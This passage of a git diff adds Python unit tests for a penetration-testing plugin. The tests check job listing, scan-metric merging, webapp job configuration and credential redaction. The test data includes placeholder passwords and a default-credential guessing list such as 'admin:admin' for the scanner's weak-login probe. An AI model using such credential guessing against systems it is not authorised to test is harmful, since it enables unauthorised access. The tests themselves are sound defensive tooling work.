self.assertEqual(saved_specs["job_status"], "STOPPED") + self.assertTrue(saved_specs["workers"]["node-A"]["finished"]) + self.assertTrue(saved_specs["workers"]["node-A"]["canceled"]) + + # Verify purge was called + plugin.purge_job.assert_called_once_with("job-1") + self.assertEqual(result, purge_result) + + + +class TestPhase15Listing(unittest.TestCase): + """Phase 15: Listing Endpoint Optimization.""" + + @classmethod + def _mock_plugin_modules(cls): + if 'extensions.business.cybersec.red_mesh.pentester_api_01' in sys.modules: + return + mock_plugin_modules() + + def _get_plugin_class(self): + self._mock_plugin_modules() + from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin + return PentesterApi01Plugin + + def test_list_finalized_returns_stub_fields(self): + """Finalized jobs return exact CStoreJobFinalized fields.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + + finalized_stub = { + "job_id": "job-1", + "job_status": "FINALIZED", + "target": "10.0.0.1", + "scan_type": "webapp", + "target_url": "https://example.com/app", + "task_name": "scan-1", + "risk_score": 75, + "run_mode": "SINGLEPASS", + "duration": 120.5, + "pass_count": 1, + "launcher": "0xLauncher", + "launcher_alias": "node1", + "worker_count": 2, + "start_port": 1, + "end_port": 1024, + "date_created": 1700000000.0, + "date_completed": 1700000120.0, + "job_cid": "QmArchive123", + "job_config_cid": "QmConfig456", + } + plugin.chainstore_hgetall.return_value = {"job-1": finalized_stub} + plugin._normalize_job_record = MagicMock(return_value=("job-1", finalized_stub)) + + result = Plugin.list_network_jobs(plugin) + self.assertIn("job-1", result) + entry = result["job-1"] + + # All CStoreJobFinalized fields present + self.assertEqual(entry["job_id"], "job-1") + self.assertEqual(entry["job_status"], "FINALIZED") + self.assertEqual(entry["job_cid"], "QmArchive123") + self.assertEqual(entry["job_config_cid"], 
"QmConfig456") + self.assertEqual(entry["scan_type"], "webapp") + self.assertEqual(entry["target_url"], "https://example.com/app") + self.assertEqual(entry["target"], "10.0.0.1") + self.assertEqual(entry["risk_score"], 75) + self.assertEqual(entry["duration"], 120.5) + self.assertEqual(entry["pass_count"], 1) + self.assertEqual(entry["worker_count"], 2) + + def test_list_running_stripped(self): + """Running jobs have listing fields but no heavy data.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + + running_spec = { + "job_id": "job-2", + "job_status": "RUNNING", + "target": "10.0.0.2", + "scan_type": "webapp", + "target_url": "https://example.com/live", + "task_name": "scan-2", + "risk_score": 0, + "run_mode": "CONTINUOUS_MONITORING", + "start_port": 1, + "end_port": 65535, + "date_created": 1700000000.0, + "launcher": "0xLauncher", + "launcher_alias": "node1", + "job_pass": 3, + "job_config_cid": "QmConfig789", + "workers": { + "addr-A": {"start_port": 1, "end_port": 32767, "finished": False, "report_cid": "QmBigReport1"}, + "addr-B": {"start_port": 32768, "end_port": 65535, "finished": False, "report_cid": "QmBigReport2"}, + }, + "timeline": [ + {"event": "created", "ts": 1700000000.0}, + {"event": "started", "ts": 1700000001.0}, + ], + "pass_reports": [ + {"pass_nr": 1, "report_cid": "QmPass1"}, + {"pass_nr": 2, "report_cid": "QmPass2"}, + ], + "redmesh_job_start_attestation": {"big": "blob"}, + } + plugin.chainstore_hgetall.return_value = {"job-2": running_spec} + plugin._normalize_job_record = MagicMock(return_value=("job-2", running_spec)) + + result = Plugin.list_network_jobs(plugin) + self.assertIn("job-2", result) + entry = result["job-2"] + + # Listing essentials present + self.assertEqual(entry["job_id"], "job-2") + self.assertEqual(entry["job_status"], "RUNNING") + self.assertEqual(entry["target"], "10.0.0.2") + self.assertEqual(entry["scan_type"], "webapp") + 
self.assertEqual(entry["target_url"], "https://example.com/live") + self.assertEqual(entry["task_name"], "scan-2") + self.assertEqual(entry["run_mode"], "CONTINUOUS_MONITORING") + self.assertEqual(entry["job_pass"], 3) + self.assertEqual(entry["worker_count"], 2) + self.assertEqual(entry["pass_count"], 2) + + # Heavy fields stripped + self.assertNotIn("workers", entry) + self.assertNotIn("timeline", entry) + self.assertNotIn("pass_reports", entry) + self.assertNotIn("redmesh_job_start_attestation", entry) + self.assertNotIn("job_config_cid", entry) + self.assertNotIn("report_cid", entry) + + + +class TestPhase16ScanMetrics(unittest.TestCase): + """Phase 16: Scan Metrics Collection.""" + + def test_metrics_collector_empty_build(self): + """build() with zero data returns ScanMetrics with defaults, no crash.""" + from extensions.business.cybersec.red_mesh.worker import MetricsCollector + mc = MetricsCollector() + result = mc.build() + d = result.to_dict() + self.assertEqual(d.get("total_duration", 0), 0) + self.assertEqual(d.get("rate_limiting_detected", False), False) + self.assertEqual(d.get("blocking_detected", False), False) + # No crash, sparse output + self.assertNotIn("connection_outcomes", d) + self.assertNotIn("response_times", d) + + def test_metrics_collector_records_connections(self): + """After recording outcomes, connection_outcomes has correct counts.""" + from extensions.business.cybersec.red_mesh.worker import MetricsCollector + mc = MetricsCollector() + mc.start_scan(100) + mc.record_connection("connected", 0.05) + mc.record_connection("connected", 0.03) + mc.record_connection("timeout", 1.0) + mc.record_connection("refused", 0.01) + d = mc.build().to_dict() + outcomes = d["connection_outcomes"] + self.assertEqual(outcomes["connected"], 2) + self.assertEqual(outcomes["timeout"], 1) + self.assertEqual(outcomes["refused"], 1) + self.assertEqual(outcomes["total"], 4) + # Response times computed + rt = d["response_times"] + self.assertIn("mean", rt) + 
self.assertIn("p95", rt) + self.assertEqual(rt["count"], 4) + + def test_metrics_collector_records_probes(self): + """After recording probes, probe_breakdown has entries.""" + from extensions.business.cybersec.red_mesh.worker import MetricsCollector + mc = MetricsCollector() + mc.start_scan(10) + mc.record_probe("_service_info_http", "completed") + mc.record_probe("_service_info_ssh", "completed") + mc.record_probe("_web_test_xss", "skipped:no_http") + d = mc.build().to_dict() + self.assertEqual(d["probes_attempted"], 3) + self.assertEqual(d["probes_completed"], 2) + self.assertEqual(d["probes_skipped"], 1) + self.assertEqual(d["probe_breakdown"]["_service_info_http"], "completed") + self.assertEqual(d["probe_breakdown"]["_web_test_xss"], "skipped:no_http") + + def test_metrics_collector_phase_durations(self): + """start/end phases produce positive durations.""" + import time + from extensions.business.cybersec.red_mesh.worker import MetricsCollector + mc = MetricsCollector() + mc.start_scan(10) + mc.phase_start("port_scan") + time.sleep(0.01) + mc.phase_end("port_scan") + d = mc.build().to_dict() + self.assertIn("phase_durations", d) + self.assertGreater(d["phase_durations"]["port_scan"], 0) + + def test_metrics_collector_findings(self): + """record_finding tracks severity distribution.""" + from extensions.business.cybersec.red_mesh.worker import MetricsCollector + mc = MetricsCollector() + mc.start_scan(10) + mc.record_finding("HIGH") + mc.record_finding("HIGH") + mc.record_finding("MEDIUM") + mc.record_finding("INFO") + d = mc.build().to_dict() + fd = d["finding_distribution"] + self.assertEqual(fd["HIGH"], 2) + self.assertEqual(fd["MEDIUM"], 1) + self.assertEqual(fd["INFO"], 1) + + def test_metrics_collector_coverage(self): + """Coverage tracks ports scanned vs in range.""" + from extensions.business.cybersec.red_mesh.worker import MetricsCollector + mc = MetricsCollector() + mc.start_scan(100) + for i in range(50): + mc.record_connection("connected" if i < 5 
else "refused", 0.01) + # Simulate finding 5 open ports with banner confirmation + for i in range(5): + mc.record_open_port(8000 + i, protocol="http" if i < 3 else "ssh", banner_confirmed=(i < 3)) + d = mc.build().to_dict() + cov = d["coverage"] + self.assertEqual(cov["ports_in_range"], 100) + self.assertEqual(cov["ports_scanned"], 50) + self.assertEqual(cov["coverage_pct"], 50.0) + self.assertEqual(cov["open_ports_count"], 5) + # Open port details + self.assertEqual(len(d["open_port_details"]), 5) + self.assertEqual(d["open_port_details"][0]["port"], 8000) + self.assertEqual(d["open_port_details"][0]["protocol"], "http") + self.assertTrue(d["open_port_details"][0]["banner_confirmed"]) + self.assertFalse(d["open_port_details"][3]["banner_confirmed"]) + # Banner confirmation + self.assertEqual(d["banner_confirmation"]["confirmed"], 3) + self.assertEqual(d["banner_confirmation"]["guessed"], 2) + + def test_scan_metrics_model_roundtrip(self): + """ScanMetrics.from_dict(sm.to_dict()) preserves all fields.""" + from extensions.business.cybersec.red_mesh.models.shared import ScanMetrics + sm = ScanMetrics( + phase_durations={"port_scan": 10.5, "fingerprint": 3.2}, + total_duration=15.0, + connection_outcomes={"connected": 50, "timeout": 5, "total": 55}, + response_times={"min": 0.01, "max": 1.0, "mean": 0.1, "median": 0.08, "stddev": 0.05, "p95": 0.5, "p99": 0.9, "count": 55}, + rate_limiting_detected=True, + blocking_detected=False, + coverage={"ports_in_range": 1000, "ports_scanned": 1000, "ports_skipped": 0, "coverage_pct": 100.0}, + probes_attempted=5, + probes_completed=4, + probes_skipped=1, + probes_failed=0, + probe_breakdown={"_service_info_http": "completed"}, + finding_distribution={"HIGH": 3, "MEDIUM": 2}, + ) + d = sm.to_dict() + sm2 = ScanMetrics.from_dict(d) + self.assertEqual(sm2.to_dict(), d) + + def test_scan_metrics_strip_none(self): + """Empty/None fields stripped from serialization.""" + from extensions.business.cybersec.red_mesh.models.shared import 
ScanMetrics + sm = ScanMetrics() + d = sm.to_dict() + self.assertNotIn("phase_durations", d) + self.assertNotIn("connection_outcomes", d) + self.assertNotIn("response_times", d) + self.assertNotIn("slow_ports", d) + self.assertNotIn("probe_breakdown", d) + + def test_merge_worker_metrics(self): + """_merge_worker_metrics sums outcomes, coverage, findings; maxes duration; ORs flags.""" + mock_plugin_modules() + from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin + m1 = { + "connection_outcomes": {"connected": 30, "timeout": 5, "total": 35}, + "coverage": {"ports_in_range": 500, "ports_scanned": 500, "ports_skipped": 0, "coverage_pct": 100.0, "open_ports_count": 3}, + "finding_distribution": {"HIGH": 2, "MEDIUM": 1}, + "service_distribution": {"http": 2, "ssh": 1}, + "probe_breakdown": {"_service_info_http": "completed", "_web_test_xss": "completed"}, + "phase_durations": {"port_scan": 30.0, "fingerprint": 10.0, "service_probes": 15.0}, + "response_times": {"min": 0.01, "max": 0.5, "mean": 0.05, "median": 0.04, "stddev": 0.03, "p95": 0.2, "p99": 0.4, "count": 500}, + "probes_attempted": 3, "probes_completed": 3, "probes_skipped": 0, "probes_failed": 0, + "total_duration": 60.0, + "rate_limiting_detected": False, "blocking_detected": False, + "open_port_details": [ + {"port": 22, "protocol": "ssh", "banner_confirmed": True}, + {"port": 80, "protocol": "http", "banner_confirmed": True}, + {"port": 443, "protocol": "http", "banner_confirmed": False}, + ], + "banner_confirmation": {"confirmed": 2, "guessed": 1}, + } + m2 = { + "connection_outcomes": {"connected": 20, "timeout": 10, "total": 30}, + "coverage": {"ports_in_range": 500, "ports_scanned": 400, "ports_skipped": 100, "coverage_pct": 80.0, "open_ports_count": 2}, + "finding_distribution": {"HIGH": 1, "LOW": 3}, + "service_distribution": {"http": 1, "mysql": 1}, + "probe_breakdown": {"_service_info_http": "completed", "_service_info_mysql": "completed", "_web_test_xss": 
"failed"}, + "phase_durations": {"port_scan": 45.0, "fingerprint": 8.0, "service_probes": 20.0}, + "response_times": {"min": 0.02, "max": 0.8, "mean": 0.08, "median": 0.06, "stddev": 0.05, "p95": 0.3, "p99": 0.7, "count": 400}, + "probes_attempted": 3, "probes_completed": 2, "probes_skipped": 1, "probes_failed": 0, + "total_duration": 75.0, + "rate_limiting_detected": True, "blocking_detected": False, + "open_port_details": [ + {"port": 80, "protocol": "http", "banner_confirmed": True}, # duplicate port 80 + {"port": 3306, "protocol": "mysql", "banner_confirmed": True}, + ], + "banner_confirmation": {"confirmed": 2, "guessed": 0}, + } + merged = PentesterApi01Plugin._merge_worker_metrics([m1, m2]) + # Sums + self.assertEqual(merged["connection_outcomes"]["connected"], 50) + self.assertEqual(merged["connection_outcomes"]["timeout"], 15) + self.assertEqual(merged["connection_outcomes"]["total"], 65) + self.assertEqual(merged["coverage"]["ports_in_range"], 1000) + self.assertEqual(merged["coverage"]["ports_scanned"], 900) + self.assertEqual(merged["coverage"]["ports_skipped"], 100) + self.assertEqual(merged["coverage"]["coverage_pct"], 90.0) + self.assertEqual(merged["coverage"]["open_ports_count"], 5) + self.assertEqual(merged["finding_distribution"]["HIGH"], 3) + self.assertEqual(merged["finding_distribution"]["LOW"], 3) + self.assertEqual(merged["finding_distribution"]["MEDIUM"], 1) + self.assertEqual(merged["probes_attempted"], 6) + self.assertEqual(merged["probes_completed"], 5) + self.assertEqual(merged["probes_skipped"], 1) + # Service distribution summed + self.assertEqual(merged["service_distribution"]["http"], 3) + self.assertEqual(merged["service_distribution"]["ssh"], 1) + self.assertEqual(merged["service_distribution"]["mysql"], 1) + # Probe breakdown: union, worst status wins + self.assertEqual(merged["probe_breakdown"]["_service_info_http"], "completed") + self.assertEqual(merged["probe_breakdown"]["_service_info_mysql"], "completed") + 
self.assertEqual(merged["probe_breakdown"]["_web_test_xss"], "failed") # failed > completed + # Phase durations: max per phase (threads/nodes run in parallel) + self.assertEqual(merged["phase_durations"]["port_scan"], 45.0) + self.assertEqual(merged["phase_durations"]["fingerprint"], 10.0) + self.assertEqual(merged["phase_durations"]["service_probes"], 20.0) + # Response times: merged stats + rt = merged["response_times"] + self.assertEqual(rt["min"], 0.01) # global min + self.assertEqual(rt["max"], 0.8) # global max + self.assertEqual(rt["count"], 900) # total count + # Weighted mean: (0.05*500 + 0.08*400) / 900 ≈ 0.0633 + self.assertAlmostEqual(rt["mean"], 0.0633, places=3) + self.assertEqual(rt["p95"], 0.3) # max of per-thread p95 + self.assertEqual(rt["p99"], 0.7) # max of per-thread p99 + # Max duration + self.assertEqual(merged["total_duration"], 75.0) + # OR flags + self.assertTrue(merged["rate_limiting_detected"]) + self.assertFalse(merged["blocking_detected"]) + # Open port details: deduplicated by port, sorted + opd = merged["open_port_details"] + self.assertEqual(len(opd), 4) # 22, 80, 443, 3306 (80 deduplicated) + self.assertEqual(opd[0]["port"], 22) + self.assertEqual(opd[1]["port"], 80) + self.assertEqual(opd[2]["port"], 443) + self.assertEqual(opd[3]["port"], 3306) + # Banner confirmation: summed + self.assertEqual(merged["banner_confirmation"]["confirmed"], 4) + self.assertEqual(merged["banner_confirmation"]["guessed"], 1) + + + def test_close_job_merges_thread_metrics(self): + """16b: _close_job replaces generically-merged scan_metrics with properly summed metrics.""" + mock_plugin_modules() + from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin + + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + plugin.ee_addr = "node-A" + + # Two mock workers with different scan_metrics + worker1 = MagicMock() + worker1.get_status.return_value = { + "open_ports": [80], "service_info": {}, "scan_metrics": { + 
"connection_outcomes": {"connected": 10, "timeout": 2, "total": 12}, + "total_duration": 30.0, + "probes_attempted": 2, "probes_completed": 2, "probes_skipped": 0, "probes_failed": 0, + "rate_limiting_detected": False, "blocking_detected": False, + } + } + worker2 = MagicMock() + worker2.get_status.return_value = { + "open_ports": [443], "service_info": {}, "scan_metrics": { + "connection_outcomes": {"connected": 8, "timeout": 5, "total": 13}, + "total_duration": 45.0, + "probes_attempted": 2, "probes_completed": 1, "probes_skipped": 1, "probes_failed": 0, + "rate_limiting_detected": True, "blocking_detected": False, + } + } + plugin.scan_jobs = {"job-1": {"t1": worker1, "t2": worker2}} + + # _get_aggregated_report with merge_objects_deep would do last-writer-wins on leaf ints + # Simulate that by returning worker2's metrics (wrong — should be summed) + plugin._get_aggregated_report = MagicMock(return_value={ + "open_ports": [80, 443], "service_info": {}, + "scan_metrics": { + "connection_outcomes": {"connected": 8, "timeout": 5, "total": 13}, + "total_duration": 45.0, + } + }) + # Use real static method for merge + plugin._merge_worker_metrics = PentesterApi01Plugin._merge_worker_metrics + + saved_reports = [] + def capture_add_json(data, show_logs=False): + saved_reports.append(data) + return "QmReport123" + plugin.r1fs.add_json.side_effect = capture_add_json + + job_specs = {"job_id": "job-1", "target": "10.0.0.1", "workers": {}} + plugin.chainstore_hget.return_value = job_specs + plugin._normalize_job_record = MagicMock(return_value=("job-1", job_specs)) + plugin._get_job_config = MagicMock(return_value={"redact_credentials": False}) + plugin._redact_report = MagicMock(side_effect=lambda r: r) + + PentesterApi01Plugin._close_job(plugin, "job-1") + + # The report saved to R1FS should have properly merged metrics + self.assertEqual(len(saved_reports), 1) + sm = saved_reports[0].get("scan_metrics") + self.assertIsNotNone(sm) + # Connection outcomes should be 
summed, not last-writer-wins + self.assertEqual(sm["connection_outcomes"]["connected"], 18) + self.assertEqual(sm["connection_outcomes"]["timeout"], 7) + self.assertEqual(sm["connection_outcomes"]["total"], 25) + # Max duration + self.assertEqual(sm["total_duration"], 45.0) + # Probes summed + self.assertEqual(sm["probes_attempted"], 4) + self.assertEqual(sm["probes_completed"], 3) + # OR flags + self.assertTrue(sm["rate_limiting_detected"]) + + def test_finalize_pass_attaches_pass_metrics(self): + """16c: _maybe_finalize_pass merges node metrics into PassReport.scan_metrics.""" + mock_plugin_modules() + from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin + + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + plugin.ee_addr = "node-launcher" + plugin.cfg_llm_agent = {"ENABLED": False} + plugin.cfg_attestation = {"ENABLED": True, "PRIVATE_KEY": "", "MIN_SECONDS_BETWEEN_SUBMITS": 3600, "RETRIES": 2} + + # Two workers, each with a report_cid + workers = { + "node-A": {"finished": True, "report_cid": "cid-report-A"}, + "node-B": {"finished": True, "report_cid": "cid-report-B"}, + } + job_specs = { + "job_id": "job-1", + "job_status": "RUNNING", + "target": "10.0.0.1", + "run_mode": "SINGLEPASS", + "launcher": "node-launcher", + "workers": workers, + "job_pass": 1, + "pass_reports": [], + "timeline": [{"event": "created", "ts": 1700000000.0}], + } + plugin.chainstore_hgetall.return_value = {"job-1": job_specs} + plugin._normalize_job_record = MagicMock(return_value=("job-1", job_specs)) + plugin.time.return_value = 1700000120.0 + + # Node reports with different metrics + node_report_a = { + "open_ports": [80], "service_info": {}, "web_tests_info": {}, + "correlation_findings": [], "start_port": 1, "end_port": 32767, + "ports_scanned": 32767, + "scan_metrics": { + "connection_outcomes": {"connected": 5, "timeout": 1, "total": 6}, + "total_duration": 50.0, + "probes_attempted": 3, "probes_completed": 3, "probes_skipped": 
0, "probes_failed": 0, + "rate_limiting_detected": False, "blocking_detected": False, + } + } + node_report_b = { + "open_ports": [443], "service_info": {}, "web_tests_info": {}, + "correlation_findings": [], "start_port": 32768, "end_port": 65535, + "ports_scanned": 32768, + "scan_metrics": { + "connection_outcomes": {"connected": 3, "timeout": 4, "total": 7}, + "total_duration": 65.0, + "probes_attempted": 3, "probes_completed": 2, "probes_skipped": 0, "probes_failed": 1, + "rate_limiting_detected": False, "blocking_detected": True, + } + } + + node_reports_by_addr = {"node-A": node_report_a, "node-B": node_report_b} + plugin._collect_node_reports = MagicMock(return_value=node_reports_by_addr) + # _get_aggregated_report would use merge_objects_deep (wrong for metrics) + # Return a dict with last-writer-wins metrics to simulate the bug + plugin._get_aggregated_report = MagicMock(return_value={ + "open_ports": [80, 443], "service_info": {}, "web_tests_info": {}, + "scan_metrics": node_report_b["scan_metrics"], # wrong — just node B's + }) + # Use real static method for merge + plugin._merge_worker_metrics = PentesterApi01Plugin._merge_worker_metrics + + # Capture what gets saved as pass report + saved_pass_reports = [] + def capture_add_json(data, show_logs=False): + saved_pass_reports.append(data) + return f"QmPassReport{len(saved_pass_reports)}" + plugin.r1fs.add_json.side_effect = capture_add_json + + plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 25, "breakdown": {}}, [])) + plugin._get_job_config = MagicMock(return_value={}) + plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) + plugin._build_job_archive = MagicMock() + plugin._clear_live_progress = MagicMock() + plugin._emit_timeline_event = MagicMock() + plugin._get_timeline_date = MagicMock(return_value=1700000000.0) + plugin.Pd = MagicMock() + + PentesterApi01Plugin._maybe_finalize_pass(plugin) + + # Should have saved: aggregated_data (step 6) + pass_report (step 
10) + self.assertGreaterEqual(len(saved_pass_reports), 2) + pass_report = saved_pass_reports[-1] # Last one is the PassReport + + sm = pass_report.get("scan_metrics") + self.assertIsNotNone(sm, "PassReport should have scan_metrics") + # Connection outcomes summed across nodes + self.assertEqual(sm["connection_outcomes"]["connected"], 8) + self.assertEqual(sm["connection_outcomes"]["timeout"], 5) + self.assertEqual(sm["connection_outcomes"]["total"], 13) + # Max duration + self.assertEqual(sm["total_duration"], 65.0) + # Probes summed + self.assertEqual(sm["probes_attempted"], 6) + self.assertEqual(sm["probes_completed"], 5) + self.assertEqual(sm["probes_failed"], 1) + # OR flags + self.assertFalse(sm["rate_limiting_detected"]) + self.assertTrue(sm["blocking_detected"]) diff --git a/extensions/business/cybersec/red_mesh/tests/test_jobconfig_webapp.py b/extensions/business/cybersec/red_mesh/tests/test_jobconfig_webapp.py new file mode 100644 index 00000000..fcdacff5 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/tests/test_jobconfig_webapp.py @@ -0,0 +1,255 @@ +"""Tests for JobConfig graybox fields and blackbox Finding unchanged.""" + +import unittest + +from extensions.business.cybersec.red_mesh.models.archive import JobConfig, UiAggregate +from extensions.business.cybersec.red_mesh.models.shared import ScanMetrics +from extensions.business.cybersec.red_mesh.findings import Finding, Severity + + +class TestJobConfigWebapp(unittest.TestCase): + + def test_scan_type_default(self): + """scan_type defaults to 'network'.""" + cfg = JobConfig( + target="10.0.0.1", start_port=1, end_port=1024, + exceptions=[], distribution_strategy="SLICE", + port_order="SEQUENTIAL", nr_local_workers=2, + enabled_features=[], excluded_features=[], + run_mode="SINGLEPASS", + ) + self.assertEqual(cfg.scan_type, "network") + + def test_from_dict_with_graybox_fields(self): + """Round-trip with all graybox fields.""" + d = { + "target": "example.com", + "start_port": 1, + "end_port": 
65535, + "exceptions": [], + "distribution_strategy": "SLICE", + "port_order": "SEQUENTIAL", + "nr_local_workers": 1, + "enabled_features": [], + "excluded_features": [], + "run_mode": "SINGLEPASS", + "scan_type": "webapp", + "target_url": "https://example.com/", + "official_username": "admin", + "official_password": "secret123", + "regular_username": "user", + "regular_password": "pass456", + "weak_candidates": ["admin:admin", "test:test"], + "max_weak_attempts": 10, + "app_routes": ["/api/users/", "/api/records/"], + "verify_tls": False, + "target_config": {"login_path": "/login/"}, + "allow_stateful_probes": True, + } + cfg = JobConfig.from_dict(d) + self.assertEqual(cfg.scan_type, "webapp") + self.assertEqual(cfg.target_url, "https://example.com/") + self.assertEqual(cfg.official_username, "admin") + self.assertEqual(cfg.official_password, "secret123") + self.assertEqual(cfg.regular_username, "user") + self.assertEqual(cfg.regular_password, "pass456") + self.assertEqual(cfg.weak_candidates, ["admin:admin", "test:test"]) + self.assertEqual(cfg.max_weak_attempts, 10) + self.assertEqual(cfg.app_routes, ["/api/users/", "/api/records/"]) + self.assertFalse(cfg.verify_tls) + self.assertEqual(cfg.target_config, {"login_path": "/login/"}) + self.assertTrue(cfg.allow_stateful_probes) + + # Round-trip + restored = JobConfig.from_dict(cfg.to_dict()) + self.assertEqual(restored.scan_type, cfg.scan_type) + self.assertEqual(restored.target_url, cfg.target_url) + self.assertEqual(restored.official_username, cfg.official_username) + self.assertEqual(restored.weak_candidates, cfg.weak_candidates) + self.assertEqual(restored.allow_stateful_probes, cfg.allow_stateful_probes) + + def test_graybox_defaults(self): + """All graybox fields have sensible defaults.""" + cfg = JobConfig( + target="x", start_port=1, end_port=1, + exceptions=[], distribution_strategy="SLICE", + port_order="SEQUENTIAL", nr_local_workers=1, + enabled_features=[], excluded_features=[], + 
run_mode="SINGLEPASS", + ) + self.assertEqual(cfg.scan_type, "network") + self.assertEqual(cfg.target_url, "") + self.assertEqual(cfg.official_username, "") + self.assertEqual(cfg.official_password, "") + self.assertEqual(cfg.regular_username, "") + self.assertEqual(cfg.regular_password, "") + self.assertIsNone(cfg.weak_candidates) + self.assertEqual(cfg.max_weak_attempts, 5) + self.assertIsNone(cfg.app_routes) + self.assertTrue(cfg.verify_tls) + self.assertIsNone(cfg.target_config) + self.assertFalse(cfg.allow_stateful_probes) + + def test_redaction_masks_passwords(self): + """to_dict() includes passwords; redaction must happen at API level.""" + cfg = JobConfig( + target="x", start_port=1, end_port=1, + exceptions=[], distribution_strategy="SLICE", + port_order="SEQUENTIAL", nr_local_workers=1, + enabled_features=[], excluded_features=[], + run_mode="SINGLEPASS", + official_password="secret", + regular_password="pass", + weak_candidates=["admin:admin"], + ) + d = cfg.to_dict() + # Passwords are present in to_dict() (redaction is at the API level) + self.assertEqual(d["official_password"], "secret") + self.assertEqual(d["regular_password"], "pass") + self.assertEqual(d["weak_candidates"], ["admin:admin"]) + + def test_redact_job_config_masks_credentials(self): + """_redact_job_config masks passwords and weak_candidates.""" + from extensions.business.cybersec.red_mesh.mixins.report import _ReportMixin + d = { + "target": "x", + "official_username": "admin", + "official_password": "secret", + "regular_username": "user", + "regular_password": "pass", + "weak_candidates": ["admin:admin", "test:test"], + } + redacted = _ReportMixin._redact_job_config(d) + self.assertEqual(redacted["official_password"], "***") + self.assertEqual(redacted["regular_password"], "***") + self.assertEqual(redacted["weak_candidates"], ["***", "***"]) + # Usernames are NOT masked + self.assertEqual(redacted["official_username"], "admin") + self.assertEqual(redacted["regular_username"], "user") 
+ + def test_redact_job_config_noop_when_empty(self): + """_redact_job_config is a no-op when credential fields are empty/absent.""" + from extensions.business.cybersec.red_mesh.mixins.report import _ReportMixin + d = {"target": "x", "official_password": "", "regular_password": ""} + redacted = _ReportMixin._redact_job_config(d) + self.assertEqual(redacted["official_password"], "") + self.assertEqual(redacted["regular_password"], "") + + +class TestUiAggregateGraybox(unittest.TestCase): + + def test_graybox_fields_default(self): + """UiAggregate graybox fields default to 0 / 'network'.""" + ui = UiAggregate(total_open_ports=[], total_services=0, total_findings=0) + self.assertEqual(ui.scan_type, "network") + self.assertEqual(ui.total_routes_discovered, 0) + self.assertEqual(ui.total_forms_discovered, 0) + self.assertEqual(ui.total_scenarios, 0) + self.assertEqual(ui.total_scenarios_vulnerable, 0) + + def test_graybox_fields_roundtrip(self): + """UiAggregate graybox fields round-trip.""" + ui = UiAggregate( + total_open_ports=[443], total_services=1, total_findings=5, + scan_type="webapp", total_routes_discovered=12, + total_forms_discovered=3, total_scenarios=8, + total_scenarios_vulnerable=2, + ) + d = ui.to_dict() + restored = UiAggregate.from_dict(d) + self.assertEqual(restored.scan_type, "webapp") + self.assertEqual(restored.total_routes_discovered, 12) + self.assertEqual(restored.total_forms_discovered, 3) + self.assertEqual(restored.total_scenarios, 8) + self.assertEqual(restored.total_scenarios_vulnerable, 2) + + +class TestScanMetricsGraybox(unittest.TestCase): + + def test_scenario_fields_default(self): + """ScanMetrics scenario counters default to 0.""" + m = ScanMetrics() + self.assertEqual(m.scenarios_total, 0) + self.assertEqual(m.scenarios_vulnerable, 0) + self.assertEqual(m.scenarios_clean, 0) + self.assertEqual(m.scenarios_inconclusive, 0) + self.assertEqual(m.scenarios_error, 0) + + def test_scenario_fields_roundtrip(self): + """ScanMetrics 
scenario counters round-trip.""" + m = ScanMetrics( + scenarios_total=10, scenarios_vulnerable=3, + scenarios_clean=5, scenarios_inconclusive=1, + scenarios_error=1, + ) + d = m.to_dict() + restored = ScanMetrics.from_dict(d) + self.assertEqual(restored.scenarios_total, 10) + self.assertEqual(restored.scenarios_vulnerable, 3) + self.assertEqual(restored.scenarios_clean, 5) + self.assertEqual(restored.scenarios_inconclusive, 1) + self.assertEqual(restored.scenarios_error, 1) + + +class TestFindingUnchanged(unittest.TestCase): + """Verify blackbox Finding stays backward-compatible.""" + + def test_finding_has_expected_fields(self): + """Finding keeps legacy fields and adds optional CVSS metadata only.""" + import dataclasses + fields = dataclasses.fields(Finding) + self.assertEqual( + [f.name for f in fields], + [ + "severity", + "title", + "description", + "evidence", + "remediation", + "owasp_id", + "cwe_id", + "confidence", + "cvss_score", + "cvss_vector", + ], + ) + + def test_finding_no_probe_type(self): + """Finding does not have a probe_type attribute.""" + self.assertFalse(hasattr(Finding, 'probe_type')) + f = Finding(severity=Severity.HIGH, title="Test", description="Desc") + self.assertFalse(hasattr(f, 'probe_type')) + + def test_existing_construction_unchanged(self): + """Existing Finding construction still works.""" + f = Finding( + severity=Severity.CRITICAL, + title="SQL Injection", + description="Found SQL injection in /api/search", + evidence="error-based: syntax error near 'OR'", + remediation="Use parameterized queries", + owasp_id="A03:2021", + cwe_id="CWE-89", + confidence="certain", + ) + self.assertIsNone(f.cvss_score) + self.assertEqual(f.cvss_vector, "") + self.assertEqual(f.severity, Severity.CRITICAL) + self.assertEqual(f.title, "SQL Injection") + self.assertEqual(f.confidence, "certain") + + def test_optional_cvss_metadata_supported(self): + """Finding supports optional CVSS metadata without affecting legacy fields.""" + f = Finding( + 
severity=Severity.HIGH, + title="Broken Access Control", + description="Privilege escalation path found", + cvss_score=8.8, + cvss_vector="CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + ) + self.assertEqual(f.cvss_score, 8.8) + self.assertEqual(f.cvss_vector, "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H") + + +if __name__ == '__main__': + unittest.main() diff --git a/extensions/business/cybersec/red_mesh/tests/test_launch_service.py b/extensions/business/cybersec/red_mesh/tests/test_launch_service.py new file mode 100644 index 00000000..39491f7a --- /dev/null +++ b/extensions/business/cybersec/red_mesh/tests/test_launch_service.py @@ -0,0 +1,121 @@ +import unittest +from unittest.mock import patch + +from extensions.business.cybersec.red_mesh.constants import ( + PORT_ORDER_SEQUENTIAL, + ScanType, +) +from extensions.business.cybersec.red_mesh.services.launch import launch_local_jobs +from extensions.business.cybersec.red_mesh.services.scan_strategy import ScanStrategy + + +class DummyOwner: + def __init__(self): + self.cfg_port_order = PORT_ORDER_SEQUENTIAL + self.cfg_excluded_features = 